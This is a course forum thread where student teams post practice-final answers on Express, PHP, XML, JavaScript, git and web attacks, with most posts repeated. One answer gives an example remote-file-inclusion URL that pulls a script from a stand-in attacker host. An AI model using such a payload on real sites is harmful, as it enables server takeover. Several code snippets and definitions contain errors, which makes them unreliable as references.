2020-12-01
Practice Final.
Post your solutions to your practice final problem to this thread. Make sure to include the names of all your teammates.
Best,
Chris
Post your solutions to your practice final problem to this thread. Make sure to include the names of all your teammates.
Best,
Chris
2020-12-07
Breakout room 5: Chris Douglas, George Michael Cuevas, Zihao Lin
10.a
suppose in the folder /src/public, there is some html pages.
const express = require('express')
const router = express()
router.listen('5002', () => {
console.log('listening on 5002');
});
router.get('/servehtmlfile',(req,res)=>{
res.sendFile('/src/public/index.html')
})
app.get('/servehtmlinline', function (req, res) {
res.send('<div><h1>Welcome</h1></div>');});
//express automatically pickup ./src/public/index.html
router.use(express.static('./src/public'))
b. one quick way to extract value from a post form is using body parser
<!DOCTYPE html>
<head>
</head>
<body>
<form name="newList" method="post" action="/test">
<input type="text" name="FirstName" placeholder="FirstName" /> <input type="hidden" name="LastName" placeholder="LastName"/> <input type="submit" value="submit" /> </form>
</body>
const express = require('express');
const bodyParser = require('body-parser'); const app = express()
app.listen('5000', () => {
console.log('listening on 5000');
}); app.use(bodyParser.json());
app.post('/test', (req, res) => {
let lastName= req.body["LastName"] let firstName=req.body["FirstName"]
});
(Edited: 2020-12-07) Breakout room 5: Chris Douglas, George Michael Cuevas, Zihao Lin
10.a
suppose in the folder /src/public, there is some html pages.
const express = require('express')
const router = express()
router.listen('5002', () => {
console.log('listening on 5002');
});
router.get('/servehtmlfile',(req,res)=>{
res.sendFile('/src/public/index.html')
})
app.get('/servehtmlinline', function (req, res) {
res.send('<div><h1>Welcome</h1></div>');});
//express automatically pickup ./src/public/index.html
router.use(express.static('./src/public'))
b. one quick way to extract value from a post form is using body parser
<!DOCTYPE html>
<head>
</head>
<body>
<form name="newList" method="post" action="/test">
<input type="text" name="FirstName" placeholder="FirstName" />
<input type="hidden" name="LastName" placeholder="LastName"/>
<input type="submit" value="submit" />
</form>
</body>
const express = require('express');
const bodyParser = require('body-parser'); const app = express()
app.listen('5000', () => {
console.log('listening on 5000');
}); app.use(bodyParser.json());
app.post('/test', (req, res) => {
let lastName= req.body["LastName"]
let firstName=req.body["FirstName"]
});
Breakout room 5: Chris Douglas, George Michael Cuevas, Zihao Lin
9a.
An SQL injection attack is where you insert and submit SQL code into a form. The server will then try to process this form and run a SQL query with the form data on the database. For example, Batman might try to get the Joker in trouble with the IRS (because no one is crazy enough to mess with the IRS) and he might submit a form that updates the Joker's income in the IRS' database. This will caused the Joker to get audited.
9b.
In clickjacking, the user goes into a malicious site whose UI looks legitimate. Secretly, an iframe is loaded and with CSS the opacity is set to 0. The page is positioned over the iframe page that might have a button that caches the user’s attention. An example of this is I really like Pikachu. Let’s say for some reason I go into a malicious site where it says that I can win a 6ft giant Pikachu plush. It asks to fill out a form with name and address and click submit. What I don’t know is that I’m being clickjacked. The attacker wants me to click the submit button to purchase something without me knowing.
9c.
Let’s say I own a site called RoadRunner.com. I’m lazy and my site is vulnerable to allow_url_fopen and/or allow_url_include because they are set to true in the php.ini file. To attack my site, the attacker types: http://RoadRunner.com/?c=http://www.WileECoyote.com/evilscript.php. Then evilscript.php is used to run my machine with webserver privileges giving them access to the webserver.
(Edited: 2020-12-07) Breakout room 5: Chris Douglas, George Michael Cuevas, Zihao Lin
9a.
An SQL injection attack is where you insert and submit SQL code into a form. The server will then try to process this form and run a SQL query with the form data on the database. For example, Batman might try to get the Joker in trouble with the IRS (because no one is crazy enough to mess with the IRS) and he might submit a form that updates the Joker's income in the IRS' database. This will caused the Joker to get audited.
9b.
In clickjacking, the user goes into a malicious site whose UI looks legitimate. Secretly, an iframe is loaded and with CSS the opacity is set to 0. The page is positioned over the iframe page that might have a button that caches the user’s attention. An example of this is I really like Pikachu. Let’s say for some reason I go into a malicious site where it says that I can win a 6ft giant Pikachu plush. It asks to fill out a form with name and address and click submit. What I don’t know is that I’m being clickjacked. The attacker wants me to click the submit button to purchase something without me knowing.
9c.
Let’s say I own a site called RoadRunner.com. I’m lazy and my site is vulnerable to allow_url_fopen and/or allow_url_include because they are set to true in the php.ini file. To attack my site, the attacker types: http://RoadRunner.com/?c=http://www.WileECoyote.com/evilscript.php. Then evilscript.php is used to run my machine with webserver privileges giving them access to the webserver.
6. With Trevor Glassey and Caleb Nale
function validatem() {
(Edited: 2020-12-07)
let inputs = document.getElementsByTagName("input");
var i;
for (i=0; i<inputs.length(); i++) {
if(inputs[i].value.contains("1234")){
alert("Hey, you're not me");
return false;
}
}
return true;
}
6. With Trevor Glassey and Caleb Nale
function validatem() {
let inputs = document.getElementsByTagName("input");
var i;
for (i=0; i<inputs.length(); i++) {
if(inputs[i].value.contains("1234")){
alert("Hey, you're not me");
return false;
}
}
return true;
}
Trey Smith, Luksawee Phansri, Sachin Shah
7)
7) <?xml version="1.0"?>
<!DOCTYPE wedding invitation
[
<!ELEMENT note (from, date, people)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT date (#PCDATA)>
<!ELEMENT people (#PCDATA)>
]>
<note>
<to>Tove</to>
<from>Dan and Ann</from>
<date>Feb 28, 201</date>
<people>a, b, c, d</people>
</note>
Problem 8
a) CK10: The problem that servers face when they have over 10,000 clients and a limited thread pool. Inability to handle all incoming requests
b) REST: A way for clients to communicate with one another via http. REST APIs allow for GET, POST, UPDATE, and DELETE requests to be performed by applications to their backend.
c) Promise:
const axios = require('axios');
let getData = new Promise(function(resolve,reject) {
const isDataReceived = axios.get('https://api.github.com/users/mapbox');
if(isDataReceived){
resolve('Data was received');
}
else {
reject('Data was not received');
}
});
Trey Smith, Luksawee Phansri, Sachin Shah
7)
7) <?xml version="1.0"?>
<!DOCTYPE wedding invitation
[
<!ELEMENT note (from, date, people)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT date (#PCDATA)>
<!ELEMENT people (#PCDATA)>
]>
<note>
<to>Tove</to>
<from>Dan and Ann</from>
<date>Feb 28, 201</date>
<people>a, b, c, d</people>
</note>
Problem 8
a) CK10: The problem that servers face when they have over 10,000 clients and a limited thread pool. Inability to handle all incoming requests
b) REST: A way for clients to communicate with one another via http. REST APIs allow for GET, POST, UPDATE, and DELETE requests to be performed by applications to their backend.
c) Promise:
const axios = require('axios');
let getData = new Promise(function(resolve,reject) {
const isDataReceived = axios.get('https://api.github.com/users/mapbox');
if(isDataReceived){
resolve('Data was received');
}
else {
reject('Data was not received');
}
});
5. With Huynh Phan and Caleb Nale
Describe how the value of an object property is looked up in Javascript.
When javascript looks up an object property, it first checks if that property is defined in that instance. If it is not found, it then checks the prototype object to see if the property is defined there. If not, since the prototype is also an object, it will check its prototype, and continue on until there are no more prototypes to check.
Example:
- b = new Object()
- b.thing = hi
- b.thing2 = pi
- a = new Object()
- a.prototype = b
- a.thing = li
- b.thing // equals hi
- a.thing // equals li
- a.thing2 // equals pi
- a.thing3 // equals undefined
5. With Huynh Phan and Caleb Nale
Describe how the value of an object property is looked up in Javascript.
When javascript looks up an object property, it first checks if that property is defined in that instance. If it is not found, it then checks the prototype object to see if the property is defined there. If not, since the prototype is also an object, it will check its prototype, and continue on until there are no more prototypes to check.
Example:
* b = new Object()
* b.thing = hi
* b.thing2 = pi
* a = new Object()
* a.prototype = b
* a.thing = li
* b.thing // equals hi
* a.thing // equals li
* a.thing2 // equals pi
* a.thing3 // equals undefined
3. Thomas Wang, Justin Nguyen, Shubham Patel
“In directory Thanos”
(Edited: 2020-12-07) git init Thanos gIt add randomFile git commit -m “added randomFile” git add newFile git commit -m “added newFile” git add myFile git commit -m “added myFile” git format-patch -2 --stdout > my.patch
3. Thomas Wang, Justin Nguyen, Shubham Patel
“In directory Thanos”
git init Thanos
gIt add randomFile
git commit -m “added randomFile”
git add newFile
git commit -m “added newFile”
git add myFile
git commit -m “added myFile”
git format-patch -2 --stdout > my.patch
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE wedding_invitations [
<!ELEMENT Invitation (Bride, Groom, Date)>
<!ELEMENT Bride (#PCDATA)>
<!ELEMENT Groom (#PCDATA)>
<!ELEMENT Date (#PCDATA)>
<!ATTLIST Invitation RSVP CDATA #FIXED "RSVP">
]>
<Invitation>
(Edited: 2020-12-08) <Bride>LuksaweeP</Bride> <Groom>DoNotKnow</Groom> <Date>Dec 31, 2021</Date></Invitation>
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE wedding_invitations [
<!ELEMENT Invitation (Bride, Groom, Date)>
<!ELEMENT Bride (#PCDATA)>
<!ELEMENT Groom (#PCDATA)>
<!ELEMENT Date (#PCDATA)>
<!ATTLIST Invitation RSVP CDATA #FIXED "RSVP">
]>
<Invitation>
<Bride>LuksaweeP</Bride>
<Groom>DoNotKnow</Groom>
<Date>Dec 31, 2021</Date>
</Invitation>
Colin Chow, Crispino Madamba, Janice Lu
Problem 1
<?php
$db = mysqli_connect('localhost', 'root', null, "group1");
if(!$db) {
die("Connection failed: " . mysqli_connect_error());
}
$resultsArray = array();
$selecttablestatement = "SELECT name from Employee where birthDate = '1997-04-20'";
$results = mysqli_query($db, $selecttablestatement)
$i = 0;
if(mysqli_num_rows($results) > 0) {
while($row = mysqli_fetch_assoc($results)) {
$resultsArray[$i] = $row["name"];
$i++;
}
echo "<ol>"
for($j=0; $j<count($resultsArray); $j++) {
echo "<li>".$resultsArray[$j]."</li>";
}
echo "</ol>";
} else {
echo "No matching results";
}
Problem 2
An autoloader allows for the developer to avoid using numerous requires in each file. It will also allow for the project to automatically detect and search for new class files and their location so that they can be used in any file.
<? php
// An autoloader allows us to minimize the number of files read before
// executing code, saving memory space.
if (file_exists(__DIR__."/../../vendor/autoload.php")) {
require_once __DIR__."/../../vendor/autoload.php";
} else {
(Edited: 2020-12-07)
spl_autoload_register(function ($class) {
// project-specific namespace prefix
$prefix = 'student\\fName\\Crispino';
// does the class use the namespace prefix?
$len = strlen($prefix);
if (strncmp($prefix, $class, $len) !== 0) {
$prefix = 'student\\fName';
$len = strlen($prefix);
// no, move to the next registered autoloader
if (strncmp($prefix, $class, $len) !== 0) {
return;
} else {
$check_dirs = [WORK_DIRECTORY . "/app", BASE_DIR];
}
} else {
$check_dirs = [PARENT_DIR . "/tests"];
}
// get the relative class name
$relative_class = substr($class, $len);
// use forward-slashes, add ./php
$uniixify_class_name = "/".str_replace('\\', '/', $relative_class) .
'.php';
foreach($check_dirs as $dir) {
$file = $dir . $unixify_class_name;
if (file_exists($file)) {
require $file;
break;
}
}
});
}
Colin Chow, Crispino Madamba, Janice Lu
Problem 1
<?php
$db = mysqli_connect('localhost', 'root', null, "group1");
if(!$db) {
die("Connection failed: " . mysqli_connect_error());
}
$resultsArray = array();
$selecttablestatement = "SELECT name from Employee where birthDate = '1997-04-20'";
$results = mysqli_query($db, $selecttablestatement)
$i = 0;
if(mysqli_num_rows($results) > 0) {
while($row = mysqli_fetch_assoc($results)) {
$resultsArray[$i] = $row["name"];
$i++;
}
echo "<ol>"
for($j=0; $j<count($resultsArray); $j++) {
echo "<li>".$resultsArray[$j]."</li>";
}
echo "</ol>";
} else {
echo "No matching results";
}
Problem 2
An autoloader allows for the developer to avoid using numerous requires in each file. It will also allow for the project to automatically detect and search for new class files and their location so that they can be used in any file.
<? php
// An autoloader allows us to minimize the number of files read before
// executing code, saving memory space.
if (file_exists(__DIR__."/../../vendor/autoload.php")) {
require_once __DIR__."/../../vendor/autoload.php";
} else {
spl_autoload_register(function ($class) {
// project-specific namespace prefix
$prefix = 'student\\fName\\Crispino';
// does the class use the namespace prefix?
$len = strlen($prefix);
if (strncmp($prefix, $class, $len) !== 0) {
$prefix = 'student\\fName';
$len = strlen($prefix);
// no, move to the next registered autoloader
if (strncmp($prefix, $class, $len) !== 0) {
return;
} else {
$check_dirs = [WORK_DIRECTORY . "/app", BASE_DIR];
}
} else {
$check_dirs = [PARENT_DIR . "/tests"];
}
// get the relative class name
$relative_class = substr($class, $len);
// use forward-slashes, add ./php
$uniixify_class_name = "/".str_replace('\\', '/', $relative_class) .
'.php';
foreach($check_dirs as $dir) {
$file = $dir . $unixify_class_name;
if (file_exists($file)) {
require $file;
break;
}
}
});
}
Group 2: Justin Nguyen, Shubham Patel, Thomas Wang Question 4:
function descendingNameNumbers(args) {
const numbers = [];
const resultArray = [];
args.forEach(arg => {
if(Number.isFinite(arg)) {
numbers.push(arg);
}
})
numbers.sort((a, b) => {
return b-a;
});
numbers.forEach(item => {
resultArray.push("Wang"+item);
})
console.log(resultArray);
}
const values = [2.3, 3, "lala", 1, [0, 1], {o:"yeah"}];
descendingNameNumbers(values);
Group 2: Justin Nguyen, Shubham Patel, Thomas Wang Question 4:
<pre>
function descendingNameNumbers(args) {
const numbers = [];
const resultArray = [];
args.forEach(arg => {
if(Number.isFinite(arg)) {
numbers.push(arg);
}
})
numbers.sort((a, b) => {
return b-a;
});
numbers.forEach(item => {
resultArray.push("Wang"+item);
})
console.log(resultArray);
}
const values = [2.3, 3, "lala", 1, [0, 1], {o:"yeah"}];
descendingNameNumbers(values);
</pre>
(c) 2024 Yioop - PHP Search Engine